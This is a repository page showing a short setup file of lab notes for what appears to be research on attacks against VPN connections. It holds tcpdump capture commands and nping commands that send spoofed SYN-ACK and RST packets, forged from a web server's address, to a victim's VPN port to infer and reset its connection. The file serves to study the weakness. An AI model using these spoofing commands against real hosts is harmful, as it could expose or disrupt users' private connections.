Breakpointing-Bad-Public
/
vpn-attacks
7
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
9 Commits
1 Branch
0 Tags
530 MiB
Tree: 5882c33314
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '5882c33314'
${ noResults }
vpn-attacks/pcaps/client-side-caps/nping-examples/setup.txt

28 lines
1.0 KiB
Raw Normal View History

adding original attack test scripts and demos
3 years ago
  1. Nping pcap commands during each phase:
  3. On attacker machine: `sudo tcpdump -i wlp1s0 -nnvvS not src port 22 and not dst port 22 -w wash_attacker.pcap`
  5. On victim macine: `sudo tcpdump -i any -nnvvS not src port 22 and not dst port 22 -w vic_any_capture_wash.pcap`
  9. Attacker commands
  11. Phase 2: `sudo nping -e wlp1s0 --dest-mac 08:00:27:1a:08:ba --dest-ip 10.7.7.8 --source-ip 172.217.12.14 -g 80 --tcp --flags SA -p 40402`
  13. Phase 3: `sudo nping -e wlp1s0 --dest-mac 08:00:27:1a:08:ba --dest-ip 10.7.7.8 --source-ip 172.217.12.14 -g 80 --tcp --flags R -p 40404 --seq 4253820601`
  17. Addresses in netcat example:
  20. Phase 2 pcap: --> (netcat 172.217.12.14 80 -p 40402)
  22. Remote web address (google.com) -- 172.217.12.14:80
  23. Victim VPN address -- 10.7.7.8:40402
  24. Victim public address -- 192.168.12.137
  25. VPN server address -- 153.92.40.5:443
  27. In the example, the attacker sends 5 npings with to the correct four-tuple, then sends 5 to the wrong four-tuple (port 40403). Then sends 5 more to the correct port to show differences in response.